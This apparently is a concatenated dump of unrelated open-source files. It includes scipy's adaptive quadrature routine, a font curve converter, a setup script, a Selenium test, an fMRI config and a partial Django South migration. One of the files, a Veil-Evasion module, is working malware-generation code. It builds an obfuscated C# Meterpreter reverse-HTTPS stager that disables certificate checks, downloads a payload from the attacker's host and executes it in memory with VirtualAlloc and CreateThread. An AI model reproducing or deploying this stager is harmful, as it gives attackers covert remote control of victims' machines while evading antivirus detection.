return quad_vec(f2, 0, 1, **kwargs)
elif np.isfinite(b) and np.isinf(a):
f2 = SemiInfiniteFunc(f, start=b, infty=a)
if points is not None:
kwargs['points'] = tuple(f2.get_t(xp) for xp in points)
res = quad_vec(f2, 0, 1, **kwargs)
return (-res[0],) + res[1:]
elif np.isinf(a) and np.isinf(b):
sgn = -1 if b < a else 1
# NB. explicitly split integral at t=0, which separates
# the positive and negative sides
f2 = DoubleInfiniteFunc(f)
if points is not None:
kwargs['points'] = (0,) + tuple(f2.get_t(xp) for xp in points)
else:
kwargs['points'] = (0,)
if a != b:
res = quad_vec(f2, -1, 1, **kwargs)
else:
res = quad_vec(f2, 1, 1, **kwargs)
return (res[0]*sgn,) + res[1:]
elif not (np.isfinite(a) and np.isfinite(b)):
raise ValueError("invalid integration bounds a={}, b={}".format(a, b))
norm_funcs = {
None: _max_norm,
'max': _max_norm,
'2': np.linalg.norm
}
if callable(norm):
norm_func = norm
else:
norm_func = norm_funcs[norm]
parallel_count = 128
min_intervals = 2
try:
_quadrature = {None: _quadrature_gk21,
'gk21': _quadrature_gk21,
'gk15': _quadrature_gk15,
'trapz': _quadrature_trapezoid, # alias for backcompat
'trapezoid': _quadrature_trapezoid}[quadrature]
except KeyError as e:
raise ValueError("unknown quadrature {!r}".format(quadrature)) from e
# Initial interval set
if points is None:
initial_intervals = [(a, b)]
else:
prev = a
initial_intervals = []
for p in sorted(points):
p = float(p)
if not (a < p < b) or p == prev:
continue
initial_intervals.append((prev, p))
prev = p
initial_intervals.append((prev, b))
global_integral = None
global_error = None
rounding_error = None
interval_cache = None
intervals = []
neval = 0
for x1, x2 in initial_intervals:
ig, err, rnd = _quadrature(x1, x2, f, norm_func)
neval += _quadrature.num_eval
if global_integral is None:
if isinstance(ig, (float, complex)):
# Specialize for scalars
if norm_func in (_max_norm, np.linalg.norm):
norm_func = abs
global_integral = ig
global_error = float(err)
rounding_error = float(rnd)
cache_count = cache_size // _get_sizeof(ig)
interval_cache = LRUDict(cache_count)
else:
global_integral += ig
global_error += err
rounding_error += rnd
interval_cache[(x1, x2)] = copy.copy(ig)
intervals.append((-err, x1, x2))
heapq.heapify(intervals)
CONVERGED = 0
NOT_CONVERGED = 1
ROUNDING_ERROR = 2
NOT_A_NUMBER = 3
status_msg = {
CONVERGED: "Target precision reached.",
NOT_CONVERGED: "Target precision not reached.",
ROUNDING_ERROR: "Target precision could not be reached due to rounding error.",
NOT_A_NUMBER: "Non-finite values encountered."
}
# Process intervals
with MapWrapper(workers) as mapwrapper:
ier = NOT_CONVERGED
while intervals and len(intervals) < limit:
# Select intervals with largest errors for subdivision
tol = max(epsabs, epsrel*norm_func(global_integral))
to_process = []
err_sum = 0
for j in range(parallel_count):
if not intervals:
break
if j > 0 and err_sum > global_error - tol/8:
# avoid unnecessary parallel splitting
break
interval = heapq.heappop(intervals)
neg_old_err, a, b = interval
old_int = interval_cache.pop((a, b), None)
to_process.append(((-neg_old_err, a, b, old_int), f, norm_func, _quadrature))
err_sum += -neg_old_err
# Subdivide intervals
for dint, derr, dround_err, subint, dneval in mapwrapper(_subdivide_interval, to_process):
neval += dneval
global_integral += dint
global_error += derr
rounding_error += dround_err
for x in subint:
x1, x2, ig, err = x
interval_cache[(x1, x2)] = ig
heapq.heappush(intervals, (-err, x1, x2))
# Termination check
if len(intervals) >= min_intervals:
tol = max(epsabs, epsrel*norm_func(global_integral))
if global_error < tol/8:
ier = CONVERGED
break
if global_error < rounding_error:
ier = ROUNDING_ERROR
break
if not (np.isfinite(global_error) and np.isfinite(rounding_error)):
ier = NOT_A_NUMBER
break
res = global_integral
err = global_error + rounding_error
if full_output:
res_arr = np.asarray(res)
dummy = np.full(res_arr.shape, np.nan, dtype=res_arr.dtype)
integrals = np.array([interval_cache.get((z[1], z[2]), dummy)
for z in intervals], dtype=res_arr.dtype)
errors = np.array([-z[0] for z in intervals])
intervals = np.array([[z[1], z[2]] for z in intervals])
info = _Bunch(neval=neval,
success=(ier == CONVERGED),
status=ier,
message=status_msg[ier],
intervals=intervals,
integrals=integrals,
errors=errors)
return (res, err, info)
else:
return (res, err)
def _subdivide_interval(args):
interval, f, norm_func, _quadrature = args
old_err, a, b, old_int = interval
c = 0.5 * (a + b)
# Left-hand side
if getattr(_quadrature, 'cache_size', 0) > 0:
f = functools.lru_cache(_quadrature.cache_size)(f)
s1, err1, round1 = _quadrature(a, c, f, norm_func)
dneval = _quadrature.num_eval
s2, err2, round2 = _quadrature(c, b, f, norm_func)
dneval += _quadrature.num_eval
if old_int is None:
old_int, _, _ = _quadrature(a, b, f, norm_func)
dneval += _quadrature.num_eval
if getattr(_quadrature, 'cache_size', 0) > 0:
dneval = f.cache_info().misses
dint = s1 + s2 - old_int
derr = err1 + err2 - old_err
dround_err = round1 + round2
subintervals = ((a, c, s1, err1), (c, b, s2, err2))
return dint, derr, dround_err, subintervals, dneval
def _quadrature_trapezoid(x1, x2, f, norm_func):
"""
Composite trapezoid quadrature
"""
x3 = 0.5*(x1 + x2)
f1 = f(x1)
f2 = f(x2)
f3 = f(x3)
s2 = 0.25 * (x2 - x1) * (f1 + 2*f3 + f2)
round_err = 0.25 * abs(x2 - x1) * (float(norm_func(f1))
+ 2*float(norm_func(f3))
+ float(norm_func(f2))) * 2e-16
s1 = 0.5 * (x2 - x1) * (f1 + f2)
err = 1/3 * float(norm_func(s1 - s2))
return s2, err, round_err
_quadrature_trapezoid.cache_size = 3 * 3
_quadrature_trapezoid.num_eval = 3
def _quadrature_gk(a, b, f, norm_func, x, w, v):
"""
Generic Gauss-Kronrod quadrature
"""
fv = [0.0]*len(x)
c = 0.5 * (a + b)
h = 0.5 * (b - a)
# Gauss-Kronrod
s_k = 0.0
s_k_abs = 0.0
for i in range(len(x)):
ff = f(c + h*x[i])
fv[i] = ff
vv = v[i]
# \int f(x)
s_k += vv * ff
# \int |f(x)|
s_k_abs += vv * abs(ff)
# Gauss
s_g = 0.0
for i in range(len(w)):
s_g += w[i] * fv[2*i + 1]
# Quadrature of abs-deviation from average
s_k_dabs = 0.0
y0 = s_k / 2.0
for i in range(len(x)):
# \int |f(x) - y0|
s_k_dabs += v[i] * abs(fv[i] - y0)
# Use similar error estimation as quadpack
err = float(norm_func((s_k - s_g) * h))
dabs = float(norm_func(s_k_dabs * h))
if dabs != 0 and err != 0:
err = dabs * min(1.0, (200 * err / dabs)**1.5)
eps = sys.float_info.epsilon
round_err = float(norm_func(50 * eps * h * s_k_abs))
if round_err > sys.float_info.min:
err = max(err, round_err)
return h * s_k, err, round_err
def _quadrature_gk21(a, b, f, norm_func):
"""
Gauss-Kronrod 21 quadrature with error estimate
"""
# Gauss-Kronrod points
x = (0.995657163025808080735527280689003,
0.973906528517171720077964012084452,
0.930157491355708226001207180059508,
0.865063366688984510732096688423493,
0.780817726586416897063717578345042,
0.679409568299024406234327365114874,
0.562757134668604683339000099272694,
0.433395394129247190799265943165784,
0.294392862701460198131126603103866,
0.148874338981631210884826001129720,
0,
-0.148874338981631210884826001129720,
-0.294392862701460198131126603103866,
-0.433395394129247190799265943165784,
-0.562757134668604683339000099272694,
-0.679409568299024406234327365114874,
-0.780817726586416897063717578345042,
-0.865063366688984510732096688423493,
-0.930157491355708226001207180059508,
-0.973906528517171720077964012084452,
-0.995657163025808080735527280689003)
# 10-point weights
w = (0.066671344308688137593568809893332,
0.149451349150580593145776339657697,
0.219086362515982043995534934228163,
0.269266719309996355091226921569469,
0.295524224714752870173892994651338,
0.295524224714752870173892994651338,
0.269266719309996355091226921569469,
0.219086362515982043995534934228163,
0.149451349150580593145776339657697,
0.066671344308688137593568809893332)
# 21-point weights
v = (0.011694638867371874278064396062192,
0.032558162307964727478818972459390,
0.054755896574351996031381300244580,
0.075039674810919952767043140916190,
0.093125454583697605535065465083366,
0.109387158802297641899210590325805,
0.123491976262065851077958109831074,
0.134709217311473325928054001771707,
0.142775938577060080797094273138717,
0.147739104901338491374841515972068,
0.149445554002916905664936468389821,
0.147739104901338491374841515972068,
0.142775938577060080797094273138717,
0.134709217311473325928054001771707,
0.123491976262065851077958109831074,
0.109387158802297641899210590325805,
0.093125454583697605535065465083366,
0.075039674810919952767043140916190,
0.054755896574351996031381300244580,
0.032558162307964727478818972459390,
0.011694638867371874278064396062192)
return _quadrature_gk(a, b, f, norm_func, x, w, v)
_quadrature_gk21.num_eval = 21
def _quadrature_gk15(a, b, f, norm_func):
"""
Gauss-Kronrod 15 quadrature with error estimate
"""
# Gauss-Kronrod points
x = (0.991455371120812639206854697526329,
0.949107912342758524526189684047851,
0.864864423359769072789712788640926,
0.741531185599394439863864773280788,
0.586087235467691130294144838258730,
0.405845151377397166906606412076961,
0.207784955007898467600689403773245,
0.000000000000000000000000000000000,
-0.207784955007898467600689403773245,
-0.405845151377397166906606412076961,
-0.586087235467691130294144838258730,
-0.741531185599394439863864773280788,
-0.864864423359769072789712788640926,
-0.949107912342758524526189684047851,
-0.991455371120812639206854697526329)
# 7-point weights
w = (0.129484966168869693270611432679082,
0.279705391489276667901467771423780,
0.381830050505118944950369775488975,
0.417959183673469387755102040816327,
0.381830050505118944950369775488975,
0.279705391489276667901467771423780,
0.129484966168869693270611432679082)
# 15-point weights
v = (0.022935322010529224963732008058970,
0.063092092629978553290700663189204,
0.104790010322250183839876322541518,
0.140653259715525918745189590510238,
0.169004726639267902826583426598550,
0.190350578064785409913256402421014,
0.204432940075298892414161999234649,
0.209482141084727828012999174891714,
0.204432940075298892414161999234649,
0.190350578064785409913256402421014,
0.169004726639267902826583426598550,
0.140653259715525918745189590510238,
0.104790010322250183839876322541518,
0.063092092629978553290700663189204,
0.022935322010529224963732008058970)
return _quadrature_gk(a, b, f, norm_func, x, w, v)
_quadrature_gk15.num_eval = 15
| bsd-3-clause |
anthrotype/roboto | scripts/lib/fontbuild/convertCurves.py | 7 | 3436 | #! /usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Converts a cubic bezier curve to a quadratic spline with
exactly two off curve points.
"""
import numpy
from numpy import array,cross,dot
from fontTools.misc import bezierTools
from robofab.objects.objectsRF import RSegment
def replaceSegments(contour, segments):
while len(contour):
contour.removeSegment(0)
for s in segments:
contour.appendSegment(s.type, [(p.x, p.y) for p in s.points], s.smooth)
def calcIntersect(a,b,c,d):
numpy.seterr(all='raise')
e = b-a
f = d-c
p = array([-e[1], e[0]])
try:
h = dot((a-c),p) / dot(f,p)
except:
print a,b,c,d
raise
return c + dot(f,h)
def simpleConvertToQuadratic(p0,p1,p2,p3):
p = [array(i.x,i.y) for i in [p0,p1,p2,p3]]
off = calcIntersect(p[0],p[1],p[2],p[3])
# OFFCURVE_VECTOR_CORRECTION = -.015
OFFCURVE_VECTOR_CORRECTION = 0
def convertToQuadratic(p0,p1,p2,p3):
# TODO: test for accuracy and subdivide further if needed
p = [(i.x,i.y) for i in [p0,p1,p2,p3]]
# if p[0][0] == p[1][0] and p[0][0] == p[2][0] and p[0][0] == p[2][0] and p[0][0] == p[3][0]:
# return (p[0],p[1],p[2],p[3])
# if p[0][1] == p[1][1] and p[0][1] == p[2][1] and p[0][1] == p[2][1] and p[0][1] == p[3][1]:
# return (p[0],p[1],p[2],p[3])
seg1,seg2 = bezierTools.splitCubicAtT(p[0], p[1], p[2], p[3], .5)
pts1 = [array([i[0], i[1]]) for i in seg1]
pts2 = [array([i[0], i[1]]) for i in seg2]
on1 = seg1[0]
on2 = seg2[3]
try:
off1 = calcIntersect(pts1[0], pts1[1], pts1[2], pts1[3])
off2 = calcIntersect(pts2[0], pts2[1], pts2[2], pts2[3])
except:
return (p[0],p[1],p[2],p[3])
off1 = (on1 - off1) * OFFCURVE_VECTOR_CORRECTION + off1
off2 = (on2 - off2) * OFFCURVE_VECTOR_CORRECTION + off2
return (on1,off1,off2,on2)
def cubicSegmentToQuadratic(c,sid):
segment = c[sid]
if (segment.type != "curve"):
print "Segment type not curve"
return
#pSegment,junk = getPrevAnchor(c,sid)
pSegment = c[sid-1] #assumes that a curve type will always be proceeded by another point on the same contour
points = convertToQuadratic(pSegment.points[-1],segment.points[0],
segment.points[1],segment.points[2])
return RSegment(
'qcurve', [[int(i) for i in p] for p in points[1:]], segment.smooth)
def glyphCurvesToQuadratic(g):
for c in g:
segments = []
for i in range(len(c)):
s = c[i]
if s.type == "curve":
try:
segments.append(cubicSegmentToQuadratic(c, i))
except Exception:
print g.name, i
raise
else:
segments.append(s)
replaceSegments(c, segments)
| apache-2.0 |
aasensio/pyAbundance | setup.py | 1 | 1219 | from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
# This line only needed if building with NumPy in Cython file.
from numpy import get_include
from os import system
# compile the fortran modules without linking
fortran_mod_comp = 'make clean ; make'
print fortran_mod_comp
system(fortran_mod_comp)
ext_modules = [Extension(# module name:
"pyAbundance",
# source file:
['pyAbundance.pyx'],
# other compile args for gcc
extra_compile_args=['-fPIC', '-O3'],
# other files to link to
extra_link_args=['chemical.o','-lgfortran'])]
setup(name = 'pyAbundance',
cmdclass = {'build_ext': build_ext},
# Needed if building with NumPy.
# This includes the NumPy headers when compiling.
include_dirs = [get_include()],
ext_modules = ext_modules,
version='0.1',
py_modules=['chemical'],
description='Chemical Equilibrium Package',
author='Andres Asensio Ramos',
author_email='[email protected]',
)
#system('cp pymilne.so ..')
| mit |
jsharkey13/isaac-selenium-testing | isaactest/tests/accept_cookies.py | 1 | 2196 | import time
from ..utils.log import log, INFO, ERROR, PASS
from ..utils.i_selenium import assert_tab
from ..utils.i_selenium import wait_for_xpath_element, wait_for_invisible_xpath
from ..tests import TestWithDependency
from selenium.common.exceptions import TimeoutException, NoSuchElementException
__all__ = ["accept_cookies"]
#####
# Test : Global Navigation Menu
#####
@TestWithDependency("ACCEPT_COOKIES", ["LOGIN"])
def accept_cookies(driver, ISAAC_WEB, WAIT_DUR, **kwargs):
"""Test whether the banner disappears after accepting cookies.
Should be run after "LOGIN" has been run, and before "LOGOUT".
- 'driver' should be a Selenium WebDriver.
- 'ISAAC_WEB' is the string URL of the Isaac website to be tested.
- 'WAIT_DUR' is the time in seconds to wait for JavaScript to run/load.
"""
assert_tab(driver, ISAAC_WEB)
time.sleep(WAIT_DUR)
try:
wait_for_xpath_element(driver, "//div[@data-alert and contains(@class, 'cookies-message')]")
time.sleep(WAIT_DUR)
log(INFO, "Clicking 'Accept' on the cookies message.")
cookie_message = driver.find_element_by_xpath("//a[contains(@class, 'cookies-accepted')]")
cookie_message.click()
except TimeoutException:
log(ERROR, "WARNING: Can't find cookies message! Has it already been accepted?!")
pass
except NoSuchElementException:
log(ERROR, "Unable to accept cookies!")
return False
try:
wait_for_invisible_xpath(driver, "//div[@data-alert and contains(@class, 'cookies-message')]")
except TimeoutException:
log(ERROR, "Cookie message didn't hide after being clicked!")
return False
try:
log(INFO, "Reloading the page to see if cookie message stays gone.")
driver.refresh()
time.sleep(WAIT_DUR)
wait_for_invisible_xpath(driver, "//div[@data-alert and contains(@class, 'cookies-message')]")
log(INFO, "Cookies message does not reappear.")
log(PASS, "The cookie message behaves as expected.")
return True
except TimeoutException:
log(ERROR, "Cookie message reappeared after page refresh!")
return False
| mit |
sgagnon/lyman-tools | timeseries/extract_info/mvpa-goodruntype_filt.py | 1 | 1176 | import os.path as op
smoothing = 'unsmoothed'
regspace = 'epi'
project = 'SST'
design = 'navcond_byruntype.csv'
func_exp = 'mvpa-resid_assigned'
onset_exp = 'mvpa-goodruntype_filt'
smoothing_fwhm = 0
standardize_feat = False
standardize_roi = False
percentsig_roi = False
percentsig_roi_relbaseline = False
tr = float(2)
tr_shift = [0, 2, 4, 6, 8, 10, 12] # in seconds
tr_integrate = [0, 2, 4, 6, 8, 10] # in seconds
basedir = op.join('/share/awagner/sgagnon', project)
analydir = op.join(basedir, 'analysis', func_exp)
expdir = op.join(basedir, 'analysis', onset_exp)
subjfile = op.join(basedir, 'scripts/subjects.txt')
# Filepath templates
tsfile = op.join(analydir, "{subid}", 'reg', regspace,
smoothing, "run_{run_id}", 'res4d_xfm.nii.gz')
func_maskfile = op.join(analydir, "{subid}", 'reg', regspace,
smoothing, "run_{run_id}", 'functional_mask_xfm.nii.gz')
maskfile = op.join(basedir, 'data', "{subid}", 'masks',
"{mask_name}.nii.gz")
meanfile = op.join(analydir, "{subid}", 'preproc',
"run_{run_id}", 'mean_func.nii.gz')
onsetfile = op.join(basedir, 'data', "{subid}", 'design', design)
| bsd-2-clause |
byt3bl33d3r/Veil-Evasion | modules/payloads/cs/meterpreter/rev_https.py | 4 | 7221 | """
Custom-written pure c# meterpreter/reverse_https stager.
Uses basic variable renaming obfuscation.
Module built by @harmj0y
"""
from modules.common import helpers
from modules.common import encryption
import random
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
self.language = "cs"
self.extension = "cs"
self.rating = "Excellent"
# options we require user interaction for- format is {Option : [Value, Description]]}
self.required_options = {"LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["8081", "Port of the metasploit handler"],
"compile_to_exe" : ["Y", "Compile to an executable"],
"use_arya" : ["N", "Use the Arya crypter"]}
def generate(self):
# imports and namespace setup
payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
payloadCode += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())
# code for the randomString() function
randomStringName = helpers.randomString()
bufferName = helpers.randomString()
charsName = helpers.randomString()
t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
# logic to turn off certificate validation
validateServerCertficateName = helpers.randomString()
payloadCode += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" %(validateServerCertficateName)
# code for the randomString() method
payloadCode += "static string %s(Random r, int s) {\n" %(randomStringName)
payloadCode += "char[] %s = new char[s];\n"%(bufferName)
payloadCode += "string %s = \"%s\";\n" %(charsName, chars)
payloadCode += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" %(bufferName, charsName, charsName)
payloadCode += "return new string(%s);}\n" %(bufferName)
# code for the checksum8() function
checksum8Name = helpers.randomString()
payloadCode += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" %(checksum8Name)
# code fo the genHTTPChecksum() function
genHTTPChecksumName = helpers.randomString()
baseStringName = helpers.randomString()
randCharsName = helpers.randomString()
urlName = helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
payloadCode += "static string %s(Random r) { string %s = \"\";\n" %(genHTTPChecksumName,baseStringName)
payloadCode += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" %(baseStringName,randomStringName)
payloadCode += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" %(randCharsName,randChars)
payloadCode += "for (int j = 0; j < %s.Length; ++j) {\n" %(randCharsName)
payloadCode += "string %s = %s + %s[j];\n" %(urlName,baseStringName,randCharsName)
payloadCode += "if (%s(%s)) {return %s;}}} return \"9vXU\";}"%(checksum8Name,urlName, urlName)
# code for getData() function
getDataName = helpers.randomString()
strName = helpers.randomString()
webClientName = helpers.randomString()
sName = helpers.randomString()
payloadCode += "static byte[] %s(string %s) {\n" %(getDataName,strName)
payloadCode += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" %(validateServerCertficateName)
payloadCode += "WebClient %s = new System.Net.WebClient();\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"Accept\", \"*/*\");\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" %(webClientName)
payloadCode += "byte[] %s = null;\n" %(sName)
payloadCode += "try { %s = %s.DownloadData(%s);\n" %(sName, webClientName, strName)
payloadCode += "if (%s.Length < 100000) return null;}\n" %(sName)
payloadCode += "catch (WebException) {}\n"
payloadCode += "return %s;}\n" %(sName)
# code fo the inject() function to inject shellcode
injectName = helpers.randomString()
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
payloadCode += "static void %s(byte[] %s) {\n" %(injectName, sName)
payloadCode += " if (%s != null) {\n" %(sName)
payloadCode += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
payloadCode += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
payloadCode += " IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
payloadCode += " UInt32 %s = 0;\n" %(threadIdName)
payloadCode += " IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
payloadCode += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
payloadCode += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)
# code for Main() to launch everything
sName = helpers.randomString()
randomName = helpers.randomString()
payloadCode += "static void Main(){\n"
payloadCode += "Random %s = new Random((int)DateTime.Now.Ticks);\n" %(randomName)
payloadCode += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" %(sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0],genHTTPChecksumName,randomName)
payloadCode += "%s(%s);}\n" %(injectName, sName)
# get 12 random variables for the API imports
r = [helpers.randomString() for x in xrange(12)]
payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
if self.required_options["use_arya"][0].lower() == "y":
payloadCode = encryption.arya(payloadCode)
return payloadCode
| gpl-3.0 |
sergeii/swat4stats.com | tracker/south_migrations/0004_add_ip_length_index.py | 1 | 13644 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.execute('CREATE INDEX tracker_ip_length ON tracker_ip ((range_to - range_from))')
def backwards(self, orm):
db.execute('DROP INDEX tracker_ip_length')
models = {
'tracker.alias': {
'Meta': {'index_together': "(('name', 'isp'),)", 'object_name': 'Alias'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isp': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'on_delete': 'models.SET_NULL', 'null': 'True', 'to': "orm['tracker.ISP']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Profile']"})
},
'tracker.game': {
'Meta': {'object_name': 'Game'},
'coop_score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'date_finished': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
'gametype': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mapname': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'outcome': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'player_num': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'rd_bombs_defused': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'rd_bombs_total': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'score_sus': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'score_swat': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Server']", 'on_delete': 'models.SET_NULL', 'null': 'True'}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True', 'unique': 'True'}),
'time': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vict_sus': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vict_swat': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
},
'tracker.ip': {
'Meta': {'object_name': 'IP', 'unique_together': "(('range_from', 'range_to'),)"},
'date_created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isp': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.ISP']", 'null': 'True'}),
'range_from': ('django.db.models.fields.BigIntegerField', [], {}),
'range_to': ('django.db.models.fields.BigIntegerField', [], {})
},
'tracker.isp': {
'Meta': {'object_name': 'ISP'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'})
},
'tracker.loadout': {
'Meta': {'object_name': 'Loadout'},
'body': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'breacher': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_five': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_four': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_one': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_three': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'equip_two': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'head': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'primary_ammo': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'secondary': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'secondary_ammo': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
},
'tracker.objective': {
'Meta': {'object_name': 'Objective'},
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.SmallIntegerField', [], {}),
'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
},
'tracker.player': {
'Meta': {'object_name': 'Player'},
'admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'alias': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Alias']"}),
'arrest_streak': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'arrested': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'arrests': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_arrests': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_incaps': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_incaps_invalid': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_enemy_kills_invalid': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_hostage_arrests': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_hostage_hits': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_hostage_incaps': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_hostage_kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'coop_toc_reports': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'death_streak': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'deaths': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'dropped': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'kill_streak': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'loadout': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Loadout']", 'on_delete': 'models.SET_NULL', 'null': 'True'}),
'rd_bombs_defused': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'sg_escapes': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
